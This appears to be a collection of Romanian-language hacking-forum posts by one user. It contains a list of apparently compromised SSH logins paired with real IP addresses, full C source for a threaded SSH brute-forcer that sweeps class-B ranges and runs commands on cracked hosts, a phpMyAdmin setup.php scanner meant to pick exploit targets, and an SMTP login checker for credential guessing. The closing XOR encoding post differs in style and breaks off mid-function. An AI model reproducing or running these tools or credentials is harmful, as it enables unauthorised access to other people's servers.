Everything posted by JIHAD
- 
	Free. alex:alex 101.50.3.79 port: 22 alex:alex 203.186.74.18 port: 22 demo:demo 216.38.153.36 port: 22 ftpuser:1234 185.31.161.16 port: 22 ftpuser:ftpuser 100.33.15.29 port: 22 ftpuser:ftpuser123 113.108.110.61 port: 22 ftpuser:ftpuser123 119.18.63.15 port: 22 ftpuser:ftpuser 124.254.9.41 port: 22 ftpuser:ftpuser 125.89.12.8 port: 22 ftpuser:ftpuser 171.65.124.20 port: 22 ftpuser:ftpuser 173.44.40.118 port: 22 ftpuser:ftpuser 176.9.2.102 port: 22 ftpuser:ftpuser 176.9.48.79 port: 22 ftpuser:ftpuser 180.153.151.49 port: 22 ftpuser:ftpuser 182.18.161.127 port: 22 ftpuser:ftpuser 183.131.12.61 port: 22 ftpuser:ftpuser 203.195.188.103 port: 22 ftpuser:ftpuser 210.14.79.185 port: 22 ftpuser:ftpuser 220.112.206.170 port: 22 guest:password 98.31.8.11 port: 22 john:john 69.64.57.58 port: 22 mary:mary 81.36.78.79 port: 22 mike:mike 195.66.155.161 port: 22 mysql:mysql 168.144.48.74 port: 22 nagios:nagios 111.93.105.51 port: 22 nagios:nagios 113.31.81.10 port: 22 nagios:nagios 113.31.81.15 port: 22 nagios:nagios 113.31.81.16 port: 22 nagios:nagios 113.31.81.17 port: 22 nagios:nagios 113.31.81.18 port: 22 nagios:nagios 113.31.81.20 port: 22 nagios:nagios 113.31.81.24 port: 22 nagios:nagios 113.31.81.34 port: 22 nagios:nagios 113.31.81.47 port: 22 nagios:nagios 113.31.81.51 port: 22 nagios:nagios 113.31.81.59 port: 22 nagios:nagios 113.31.81.61 port: 22 nagios:nagios 121.14.117.61 port: 22 nagios:nagios123 168.156.85.21 port: 22 nagios:nagios 168.156.85.21 port: 22 nagios:nagios 199.19.111.134 port: 22 nagios:nagios 201.151.167.89 port: 22 nagios:nagios 207.154.90.193 port: 22 nagios:nagios 212.45.141.7 port: 22 nagios:nagios 222.122.179.118 port: 22 nagios:nagios 50.16.26.32 port: 22 nagios:nagios 85.25.48.59 port: 22 public:public 128.125.76.37 port: 22 student:student 92.63.65.58 port: 22 student:student 92.63.72.65 port: 22 temp:temp 210.14.79.40 port: 22 test:test 107.23.51.11 port: 22 test:test 109.73.14.103 port: 22 test:test 119.28.5.84 port: 22 test:test 176.99.10.132 
port: 22 test:test 176.99.10.146 port: 22 test:test 176.99.10.154 port: 22 test:test 176.99.10.157 port: 22 test:test 176.99.11.137 port: 22 test:test 176.99.9.125 port: 22 test:test 176.99.9.171 port: 22 test:test 176.99.9.52 port: 22 test:test 176.99.9.60 port: 22 test:test 176.99.9.61 port: 22 test:test 176.99.9.65 port: 22 test:test 180.153.151.96 port: 22 test:test 194.158.52.106 port: 22 test:test 196.35.44.105 port: 22 test:test 202.120.143.114 port: 22 test:test 210.14.79.40 port: 22 test:test 211.137.44.120 port: 22 test:test 212.127.65.79 port: 22 test:test 218.24.104.59 port: 22 test:test 221.174.125.132 port: 22 test:test 221.6.13.170 port: 22 test:test 69.67.52.43 port: 22 test:test 81.19.13.18 port: 22 test:test 81.19.13.2 port: 22 test:test 81.19.13.3 port: 22 user:user 105.96.104.46 port: 22 user:user 190.60.69.10 port: 22 user:user 202.77.114.54 port: 22 user:user 210.69.150.205 port: 22 user:user 220.157.107.131 port: 22 www:www 119.254.6.11 port: 22
- 
	Bun ptr. studenti CCNA, CCNP si altele. Graphical Network Simulator - GNS3
- 
	termina website-ul, un site incomplet goneste vizitatorii. Chiar daca oferi serviciul gratuit, daca vrei sa strangi eventual "clienti" seriosi, trebuie sa fii atent la continut. Altfel spus, arata f. bine.
- 
	pare interesant din ce am citit, dar pacat ca nu-l pot folosi ptr. ca sunt pe linux. o interfata web-based ar fi fost utila, nu zic de o portare pe linux ca ar insemna o munca fara rost. oricum, bv.
- 
	trebuie sa modifici sa nu mai ai atatea argumente, si in main si in scan.
- 
	poti face, ai functia scan, incarci doar passfile, bagi un split la fiecare linie cu separator ":" si ai user si pass. succes.
- 
	Salut, Scanner-ul foloseste libssh2 (libssh2), pscan.c(inclus in codul sursa). Se ruleaza ptr. scan clasa B: ./brute -b 10.10 -t 1800 -user users.lst -pass pass.lst -p 22 -c "uname -a" Ptr. brute lista ip: ./brute -f ip.lst -t 1800 -user users.lst -pass pass.lst -p 22 -c "uname -a" -t = numarul de thread-uri -p = portul -c = "comanda de executat ip.lst = lista ip-uri cate unul per rand user.lst = lista users, cate unu per rand, pass.lst = lista parole, cate una per rand in pass.lst daca puneti $user, atunci parola va fi ca userul, daca puneti $user123, parola va fi, user123, de ex: user: oracle pass: $user123 scannerul va incerca oracle:oracle123 Sper sa va placa. Initial avea si generare de IP-uri random, dar am scos. Reverificati codul sursa daca va apar erori la compilare. #define LIBSSH2_STATIC 1 #include "libssh2_config.h" #include <libssh2.h> #ifdef HAVE_WINSOCK2_H # include <winsock2.h> #endif #ifdef HAVE_SYS_SOCKET_H # include <sys/socket.h> #endif #ifdef HAVE_NETINET_IN_H # include <netinet/in.h> #endif #ifdef HAVE_SYS_SELECT_H # include <sys/select.h> #endif # ifdef HAVE_UNISTD_H #include <unistd.h> #endif #ifdef HAVE_ARPA_INET_H # include <arpa/inet.h> #endif #include <sys/time.h> #include <sys/types.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <errno.h> #include <stdio.h> #include <ctype.h> #include <netdb.h> #include <time.h> #include <sys/wait.h> #include <termios.h> #define ALB "\033[1;37m" #define ALB2 "\033[5;37m" #define NORM "\033[00;00m" #define BOLD "\033[00;01m" #define ROSU "\033[01;31m" #define GALBE "\033[01;33m" #define VERDE "\033[01;32m" #define ALBASTRU "\033[01;34m" #define FAKE "./jahid" #define COMPUTATIONS 3000 #define TOTAL_VAL_COUNT 254 #define MAX_SOCKETS 1000 #define TIMEOUT 3 #define S_NONE 0 #define S_CONNECTING 1 #define TABLELEN 63 #define BUFFFERLEN 128 #define ENCODERLEN 4 #define ENCODEROPLEN 0 #define ENCODERBLOCKLEN 3 #define PADDINGCHAR '=' #define BASE64CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"\ 
"abcdefghijklmnopqrstuvwxyz"\ "0123456789"\ "+/"; #define _FILE_OFFSET_BITS 64 #define EOL '\n' #define CAR_RETURN '\r' #define SUCCESS 0 #define FAILURE -1 struct conn_t { int s; char status; time_t a; struct sockaddr_in addr; }; struct conn_t connlist[MAX_SOCKETS]; void init_sockets(void); void check_sockets(void); void fatal(char *); FILE *outfd; int tot = 0; int flag,where; int numforks,maxf; unsigned char denominator = TOTAL_VAL_COUNT+1; char *replace_str(char *str, char *orig, char *rep) { static char buffer[4096]; char *p; if(!(p = strstr(str, orig))) return str; strncpy(buffer, str, p-str); buffer[p-str] = '\0'; sprintf(buffer+(p-str), "%s%s", rep, p+strlen(orig)); return buffer; } void init_sockets(void) { int i; for (i = 0; i < MAX_SOCKETS; i++) { connlist[i].status = S_NONE; memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in)); } return; } void check_sockets(void) { int i, ret; for (i = 0; i < MAX_SOCKETS; i++) { if ((connlist[i].a < (time(0) - TIMEOUT)) && (connlist[i].status == S_CONNECTING)) { close(connlist[i].s); connlist[i].status = S_NONE; } else if (connlist[i].status == S_CONNECTING) { ret = connect(connlist[i].s, (struct sockaddr *)&connlist[i].addr, sizeof(struct sockaddr_in)); if (ret == -1) { if (errno == EISCONN) { tot++; fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr)); close(connlist[i].s); connlist[i].status = S_NONE; } if ((errno != EALREADY) && (errno != EINPROGRESS)) { close(connlist[i].s); connlist[i].status = S_NONE; } } else { tot++; fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr)); close(connlist[i].s); connlist[i].status = S_NONE; } } } } void fatal(char *err) { int i; printf("Error: %s\n", err); for (i = 0; i < MAX_SOCKETS; i++) if (connlist[i].status >= S_CONNECTING) close(connlist[i].s); fclose(outfd); exit(EXIT_FAILURE); } static int waitsocket(int socket_fd, LIBSSH2_SESSION *session) { struct timeval timeout; int rc; fd_set fd; fd_set *writefd = NULL; fd_set 
*readfd = NULL; int dir; timeout.tv_sec = 2; timeout.tv_usec = 0; FD_ZERO(&fd); FD_SET(socket_fd, &fd); dir = libssh2_session_block_directions(session); if(dir & LIBSSH2_SESSION_BLOCK_INBOUND) readfd = &fd; if(dir & LIBSSH2_SESSION_BLOCK_OUTBOUND) writefd = &fd; rc = select(socket_fd + 1, readfd, writefd, NULL, &timeout); return rc; } int checkauth(char *username,char *password,char *hostname, char *portar, char *command) { const char *commandline = command; FILE *vulnf,*nolog; unsigned long hostaddr; int sock, port; struct sockaddr_in sin; const char *fingerprint; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; int rc; int exitcode; char *exitsignal=(char *)"none"; int bytecount = 0; size_t len; int type, var; struct timeval timeout; timeout.tv_sec = 10; timeout.tv_usec = 0; port=atoi(portar); rc = libssh2_init (0); if (rc != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", rc); return 1; } hostaddr = inet_addr(hostname); sock = socket(AF_INET, SOCK_STREAM, 0); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr.s_addr = hostaddr; if (setsockopt (sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { return -1; } session = libssh2_session_init(); while ((rc = libssh2_session_handshake(session, sock)) == LIBSSH2_ERROR_EAGAIN); if (rc) { return -1; } while ((rc = libssh2_userauth_password(session, username, password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { goto shutdown; } while( (channel = libssh2_channel_open_session(session)) == NULL && libssh2_session_last_error(session,NULL,NULL,0) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( channel == NULL ) { goto shutdown; } while( (rc = libssh2_channel_exec(channel, commandline)) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( 
rc != 0 ) { goto shutdown; } for( ;; ) { int rc; do { char buffer[65535]; rc = libssh2_channel_read( channel, buffer, sizeof(buffer) ); if( rc > 0 ) { int i; bytecount += rc; hostname = strtok (hostname, "\n"); fprintf(stderr, "[*] WOW : %s:%s %s port: %s \n", username,password,hostname, portar); fprintf(stderr, "[*] Kernel: %s \n", buffer); vulnf=fopen("sparte.txt","a+"); fprintf(vulnf,"%s:%s %s port: %s --> %s \n",username,password,hostname,portar, buffer); fclose(vulnf); goto shutdown; for( i=0; i < rc; ++i ) var = i; } else { if( rc != LIBSSH2_ERROR_EAGAIN ) goto shutdown; } } while( rc > 0 ); if( rc == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } else break; } exitcode = 127; while( (rc = libssh2_channel_close(channel)) == LIBSSH2_ERROR_EAGAIN ) waitsocket(sock, session); if( rc == 0 ) { exitcode = libssh2_channel_get_exit_status( channel ); libssh2_channel_get_exit_signal(channel, &exitsignal, NULL, NULL, NULL, NULL, NULL); } if (exitsignal) var = var; else var = var; libssh2_channel_free(channel); close(sock); channel = NULL; libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); libssh2_exit(); exit(0); shutdown: libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); #ifdef WIN32 closesocket(sock); #else close(sock); #endif var = var; libssh2_exit(); return 0; } int scanbclass(char *bclass, char *port) { int done = 0, i, cip = 1, bb = 0, ret, k, ns, x; time_t scantime; char ip[20], outfile[128], last[256]; int unlink(const char *pathname); errno = 0; if(unlink("scan.log")) { printf("\n unlink() failed - [%s]\n",strerror(errno)); } memset(&outfile, 0, sizeof(outfile)); snprintf(outfile, sizeof(outfile) - 1, "scan.log", bclass, port); if (!(outfd = fopen(outfile, "a"))) { perror(outfile); exit(EXIT_FAILURE); } printf("[-] Searching: ", bclass); fflush(stdout); memset(&last, 0, sizeof(last)); init_sockets(); scantime = time(0); while(!done) { 
for (i = 0; i < MAX_SOCKETS; i++) { if (cip == 255) { if (bb == 255) { ns = 0; for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE) { ns++; break; } } if (ns == 0) done = 1; break; } else { cip = 0; bb++; for (x = 0; x < strlen(last); x++) putchar('\b'); memset(&last, 0, sizeof(last)); snprintf(last, sizeof(last) - 1, "%s.%d.* on port: %s [Found: %d] [%.1f%% Done]", bclass, bb, port, tot, (bb / 255.0) * 100); printf("%s", last); fflush(stdout); } } if (connlist[i].status == S_NONE) { connlist[i].s = socket(AF_INET, SOCK_STREAM, 0); if (connlist[i].s == -1) printf("Unable to allocate socket.\n"); else { ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK); if (ret == -1) { printf("Unable to set O_NONBLOCK\n"); close(connlist[i].s); } else { memset(&ip, 0, 20); sprintf(ip, "%s.%d.%d", bclass, bb, cip); connlist[i].addr.sin_addr.s_addr = inet_addr(ip); if (connlist[i].addr.sin_addr.s_addr == -1) fatal("Invalid IP."); connlist[i].addr.sin_family = AF_INET; connlist[i].addr.sin_port = htons(atoi(port)); connlist[i].a = time(0); connlist[i].status = S_CONNECTING; cip++; } } } } check_sockets(); } printf("\n[!] Scanning complete In %u Seconds. 
[We got %d ips]\n", (time(0) - scantime), tot); fclose(outfd); return 1; } int line_count(char* __str_file_name) { FILE* fd; int ch; if ((fd = fopen(__str_file_name, "r")) == NULL) { printf("[Error] : While opening the file\n"); exit(0); } unsigned int line_count = 0; while ( (ch = fgetc(fd)) != EOF) if (ch == EOL || ch == CAR_RETURN) ++line_count; if (fd) { fclose(fd); } return line_count; } int scan(char *app, char *thr, char *ipfile, char *userfile, char *passfile, char *portar, char *commandline) { int numforks, maxf, status; FILE *fp,*passf, *userf; char buff[4096]; char nutt2[4096]; char nutt[4096]; char *pass, *user; malloc(sizeof(nutt)); malloc(sizeof(nutt2)); malloc(sizeof(buff)); pid_t PID; char *ns = NULL; maxf=atoi(thr); if((userf=fopen(userfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", userfile)); while (fgets(nutt2,sizeof(nutt2),userf)){ user = strdup (nutt2); user = strtok (user, "\n"); if((passf=fopen(passfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", passfile)); while (fgets(nutt,sizeof(nutt),passf)) { pass = strdup (nutt); pass = strtok (pass, "\n"); ns = replace_str(pass, "$user", user); printf("[*] Trying: %s:%s on found ips\n",user,ns); if((fp=fopen(ipfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s", ipfile)); while(fgets(buff,sizeof(buff),fp)) { PID = fork(); if (PID < 0) { fprintf(stderr, "[!] 
Couldn't fork!\n"); exit(1); } if (( PID == 0 )){ checkauth(user,ns,buff, portar, commandline); //printf("[*] Trying: %s:%s %s:%s Protocol:%s\n",user,ns, buff,portar,prot); exit(0); } else { numforks++; if (numforks > maxf) for (numforks; numforks > maxf; numforks--) PID = wait(&status); } } fclose(fp); } fclose(passf); } fclose(userf); exit(0); } int main(int argc, char *argv[]) { int input,i=0; FILE *fp,*passf, *userf, *scanf; char encodedoutput[BUFFFERLEN + 1] = ""; char decodedoutput[BUFFFERLEN + 1] = ""; char *userfile, *passfile, *command, *threads, *scanfile, *bclass, *port, *t2, *prot; if(strcmp(argv[1],"-f")==0) { input = 1; } if(strcmp(argv[1],"-r")==0) { input = 2; } if(strcmp(argv[1],"-R")==0) { input = 3; } if(strcmp(argv[1],"-b")==0) { input = 4; } switch ( input ) { case 1: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } scanfile = argv[2]; if((scanf=fopen(scanfile,"r"))!= NULL){ if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { scan(argv[0],threads,scanfile,userfile,passfile,port,command);} else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; case 2: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { 
//genrand(argv[0],threads,userfile,passfile,port,command); } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; case 3: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) { //genrandl(threads, port); } else { goto err; } } else { goto err; } break; case 4: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } bclass = argv[2]; if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { scanbclass(bclass, port); scan(argv[0],threads,"scan.log",userfile,passfile,port, command); } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; default: printf( "Bad command, quitting!\n" ); exit (0); break; } getchar(); exit (0); err: exit (-1); } JIHAD!
- 
	Salut, in rumatorul exemplu o sa va arat un link validator folosind sockets in Linux C. In acest exemplu am folosit PMA ca target. Incercam sa validam daca fisierul respectiv exista si daca este PMA. Exemplul este bun ptr. a realiza scanner de PMA sau orice are nevoie de validare ptr. a rula exploit. #ifdef HAVE_WINSOCK2_H # include <winsock2.h> #endif #ifdef HAVE_SYS_SOCKET_H # include <sys/socket.h> #endif #ifdef HAVE_NETINET_IN_H # include <netinet/in.h> #endif #ifdef HAVE_SYS_SELECT_H # include <sys/select.h> #endif # ifdef HAVE_UNISTD_H #include <unistd.h> #endif #ifdef HAVE_ARPA_INET_H # include <arpa/inet.h> #endif #include <sys/time.h> #include <sys/types.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <errno.h> #include <stdio.h> #include <ctype.h> #include <netdb.h> #include <time.h> #include <sys/wait.h> #include <termios.h> #define USERAGENT "JIHAD HTTP AGENT" int checkpage(char *hostname, char *port, char *page) { char *authok = "Set-Cookie: phpMyAdmin="; int socket_desc; struct sockaddr_in server; char server_reply[2000]; char message[2000]; struct timeval timeout; timeout.tv_sec = 3; timeout.tv_usec = 0; socket_desc = socket(AF_INET , SOCK_STREAM , 0); if (socket_desc == -1) { return 1; } server.sin_addr.s_addr = inet_addr(hostname); server.sin_family = AF_INET; server.sin_port = htons( atoi(port) ); if (setsockopt (socket_desc, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (setsockopt (socket_desc, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (connect(socket_desc , (struct sockaddr *)&server , sizeof(server)) < 0) { return 1; } sprintf(message,"GET %s HTTP/1.0\r\nHost: %s\r\nUser-Agent: %s\r\n\r\n", page, hostname, USERAGENT); if( send(socket_desc , message , strlen(message), 0) < 0) { return 1; } if( recv(socket_desc, server_reply , 2000 , 0) < 0) { return 1; } if(strstr(server_reply, authok) != NULL) { fprintf(stderr, 
"[*] OK : %s:%s%s \n", hostname, port, page); close(socket_desc); exit (0); } else { fprintf(stderr, "[*] NOT OK : %s:%s%s \n", hostname, port, page); close(socket_desc); exit (0); } close(socket_desc); exit (0); } int main(int argc, char **argv) { checkpage(argv[1],argv[2], argv[3]); } Rulam: liviu@superstars:~/jihad-pma$ ./tutorial 64.46.50.34 80 /phpmyadmin/scripts/setup.php <p>[*] OK : 64.46.50.34:80/phpmyadmin/scripts/setup.php </p> liviu@superstars:~/jihad-pma$ ./tutorial 64.46.50.34 80 /phpmyadmin/scripts/setup.php2 <p>[*] NOT OK : 64.46.50.34:80/phpmyadmin/scripts/setup.php2 </p>
- 
	n-am vrut sa para ca m-am suparat sau agitat, ideea e ca eram interesat sa stiu care sunt cazurile cand este nevoie de CRLF. ce server, etc? asa "sunt cazuri.." pare f. vag. vroiam sa stiu in ce conditii e nevoie de CRLF. PS: stiu ca am edit, dar eram pe telefon mai devreme, mai usor mi s-a parut sa raspund asa.
- 
	argumenteaza prin exemplu practic, nu doar din auzite. e sectiunea programare, nu sectiunea post hunting.
- 
	sunt cazuri, asta e doar unul. trimiti EHLO, metoda de autentificare, si user parola criptate base64
- 
	autentificare smtp non-ssl. #ifdef HAVE_WINSOCK2_H # include <winsock2.h> #endif #ifdef HAVE_SYS_SOCKET_H # include <sys/socket.h> #endif #ifdef HAVE_NETINET_IN_H # include <netinet/in.h> #endif #ifdef HAVE_SYS_SELECT_H # include <sys/select.h> #endif # ifdef HAVE_UNISTD_H #include <unistd.h> #endif #ifdef HAVE_ARPA_INET_H # include <arpa/inet.h> #endif #include <sys/time.h> #include <sys/types.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <errno.h> #include <stdio.h> #include <ctype.h> #include <netdb.h> #include <time.h> #include <sys/wait.h> #include <termios.h> #define TABLELEN 63 #define BUFFFERLEN 128 #define ENCODERLEN 4 #define ENCODEROPLEN 0 #define ENCODERBLOCKLEN 3 #define PADDINGCHAR '=' #define BASE64CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"\ "abcdefghijklmnopqrstuvwxyz"\ "0123456789"\ "+/"; int Base64Encode(char *input, char *output, int oplen); int encodeblock(char *input, char *output, int oplen); int Base64Decode(char *input, char *output, int oplen); int decodeblock(char *input, char *output, int oplen); int encodeblock(char *input, char *output, int oplen){ int rc = 0, iplen = 0; char encodedstr[ENCODERLEN + 1] = ""; char encodingtabe[TABLELEN + 1] = BASE64CHARSET; iplen = strlen(input); encodedstr[0] = encodingtabe[ input[0] >> 2 ]; encodedstr[1] = encodingtabe[ ((input[0] & 0x03) << 4) | ((input[1] & 0xf0) >> 4) ]; encodedstr[2] = (iplen > 1 ? encodingtabe[ ((input[1] & 0x0f) << 2) | ((input[2] & 0xc0) >> 6) ] : PADDINGCHAR); encodedstr[3] = (iplen > 2 ? 
encodingtabe[ input[2] & 0x3f ] : PADDINGCHAR); strncat(output, encodedstr, oplen-strlen(output)); return rc; } int Base64Encode(char *input, char *output, int oplen){ int rc = 0; int index = 0, ipindex = 0, iplen = 0; char encoderinput[ENCODERBLOCKLEN + 1] = ""; iplen = strlen(input); while(ipindex < iplen){ for(index = 0; index < 3; index++){ if(ipindex < iplen){ encoderinput[index] = input[ipindex]; }else{ encoderinput[index] = 0; } ipindex++; } rc = encodeblock(encoderinput, output, oplen); } return rc; } int checkauth(char *username,char *password,char *hostname) { char *authok = "Authentication successful"; int rc = 0; char user[BUFFFERLEN + 1] = ""; char pass[BUFFFERLEN + 1] = ""; int socket_desc; struct sockaddr_in server; char server_reply[2000]; char message[200]; struct timeval timeout; timeout.tv_sec = 3; timeout.tv_usec = 0; socket_desc = socket(AF_INET , SOCK_STREAM , 0); if (socket_desc == -1) { return 1; } server.sin_addr.s_addr = inet_addr(hostname); server.sin_family = AF_INET; server.sin_port = htons( 25 ); if (setsockopt (socket_desc, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (setsockopt (socket_desc, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (connect(socket_desc , (struct sockaddr *)&server , sizeof(server)) < 0) { return 1; } if( recv(socket_desc, server_reply , 2000 , 0) < 0) { return 1; } sprintf(message,"EHLO JIHAD\n"); if( send(socket_desc , message , strlen(message) , 0) < 0) { return 1; } if( recv(socket_desc, server_reply , 2000 , 0) < 0) { return 1; } sprintf(message,"auth login\n"); if( send(socket_desc , message , strlen(message) , 0) < 0) { return 1; } if( recv(socket_desc, server_reply , 2000 , 0) < 0) { return 1; } rc = Base64Encode(username, user, BUFFFERLEN); sprintf(message, "%s\n", user); if( send(socket_desc , message , strlen(message) , 0) < 0) { return 1; } if( recv(socket_desc, server_reply , 2000 , 0) < 0) { 
return 1; } rc = Base64Encode(password, pass, BUFFFERLEN); sprintf(message, "%s \n", pass); if( send(socket_desc , message , strlen(message) , 0) < 0) { return 1; } if( recv(socket_desc, server_reply , 2000 , 0) < 0) { return 1; } if(strstr(server_reply, authok) != NULL) { fprintf(stderr, "[*] OK : %s:%s %s \n", username,password,hostname); close(socket_desc); } else { fprintf(stderr, "[*] NOT OK : %s:%s %s \n", username,password,hostname); close(socket_desc); exit (1); } } int main (int argc, char **argv) { checkauth(argv[1],argv[2], argv[3]); }
- 
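	/* XOR "encryption" example: string -> Base64 -> XOR with key -> Base64. */
/*
 * Compile it, then run `./enc -e string` to encrypt and `./enc -d hash`
 * to decrypt.
 *
 * Security note: repeating-key XOR under a key compiled into the binary is
 * an encoding, not encryption. The key is recoverable from the executable
 * or from a single known plaintext/ciphertext pair, and nothing detects
 * tampering. Use an authenticated cipher from a vetted library for data
 * that actually needs confidentiality.
 *
 * Fixes relative to the original listing:
 *  - the Base64 table was declared one byte too short (no terminating NUL),
 *    so the strchr() lookup could read past the array;
 *  - the XOR loop re-evaluated strlen() on the buffer it was modifying, so
 *    the first byte that XORed to zero silently truncated the data;
 *  - only the first strlen(key) bytes were masked (the rest were XORed with
 *    the key array's zero padding) and key[] was read out of bounds for
 *    long inputs; the key is now cycled, which changes the output for
 *    inputs longer than the key;
 *  - encrypt()/decrypt() were called with two arguments but take three;
 *  - argv[1]/argv[2] were dereferenced without checking argc;
 *  - bytes >= 0x80 were used as negative table indexes where char is signed.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define TABLELEN        64  /* symbols in the Base64 alphabet (was 63) */
#define BUFFFERLEN      128 /* capacity, in characters, of the work buffers */
#define ENCODERLEN      4   /* Base64 characters per encoded group */
#define ENCODEROPLEN    0
#define ENCODERBLOCKLEN 3   /* raw bytes per encoded group */
#define PADDINGCHAR     '='
#define BASE64CHARSET   "ABCDEFGHIJKLMNOPQRSTUVWXYZ" \
                        "abcdefghijklmnopqrstuvwxyz" \
                        "0123456789" \
                        "+/"

/* Hard-coded demo key; see the security note at the top of the file. */
char key[100] = "pass123";

/* One shared, NUL-terminated copy of the alphabet. */
static const char b64_table[TABLELEN + 1] = BASE64CHARSET;

int Base64Encode(char *input, char *output, int oplen);
int encodeblock(char *input, char *output, int oplen);
int Base64Decode(char *input, char *output, int oplen);
int decodeblock(char *input, char *output, int oplen);
int encrypt(char *inputs, char encodedoutput[BUFFFERLEN + 1],
            char decodedoutput[BUFFFERLEN + 1]);
int decrypt(char *inputs, char encodedoutput[BUFFFERLEN + 1],
            char decodedoutput[BUFFFERLEN + 1]);

/* Characters that may still be appended to the C string `output`. */
static size_t room_left(const char *output, int oplen)
{
    size_t used;

    if (oplen <= 0) {
        return 0;
    }
    used = strlen(output);
    return used >= (size_t)oplen ? 0 : (size_t)oplen - used;
}

/*
 * Base64-encode `len` raw bytes (which may include zero bytes) and append
 * the text to the C string in `output`, which holds at most `oplen`
 * characters plus the terminator. Returns 0, or -1 when the next group
 * would not fit (groups already appended are left in place).
 */
static int encode_bytes(const unsigned char *in, size_t len,
                        char *output, int oplen)
{
    size_t used = strlen(output);
    size_t room = room_left(output, oplen);

    for (size_t i = 0; i < len; i += ENCODERBLOCKLEN) {
        size_t n = len - i < ENCODERBLOCKLEN ? len - i : ENCODERBLOCKLEN;
        unsigned b0 = in[i];
        unsigned b1 = n > 1 ? in[i + 1] : 0;
        unsigned b2 = n > 2 ? in[i + 2] : 0;

        if (room < ENCODERLEN) {
            return -1;
        }
        output[used++] = b64_table[b0 >> 2];
        output[used++] = b64_table[((b0 & 0x03) << 4) | (b1 >> 4)];
        output[used++] = n > 1 ? b64_table[((b1 & 0x0f) << 2) | (b2 >> 6)]
                               : PADDINGCHAR;
        output[used++] = n > 2 ? b64_table[b2 & 0x3f] : PADDINGCHAR;
        output[used] = '\0';
        room -= ENCODERLEN;
    }
    return 0;
}

/*
 * Decode Base64 text into at most `cap` raw bytes at `out` and store the
 * byte count in `*outlen`. Characters outside the alphabet are skipped and
 * decoding stops at the first padding character, as in the original code.
 * Returns 0, or -1 when `out` is too small.
 */
static int decode_bytes(const char *input, unsigned char *out, size_t cap,
                        size_t *outlen)
{
    unsigned char group[ENCODERLEN] = {0};
    size_t have = 0; /* six-bit values collected for the current group */
    size_t n = 0;
    int rc = 0;

    for (const char *p = input; *p != '\0' && *p != PADDINGCHAR; p++) {
        const char *hit = memchr(b64_table, *p, TABLELEN);

        if (hit == NULL) {
            continue;
        }
        group[have++] = (unsigned char)(hit - b64_table);
        if (have < ENCODERLEN) {
            continue;
        }
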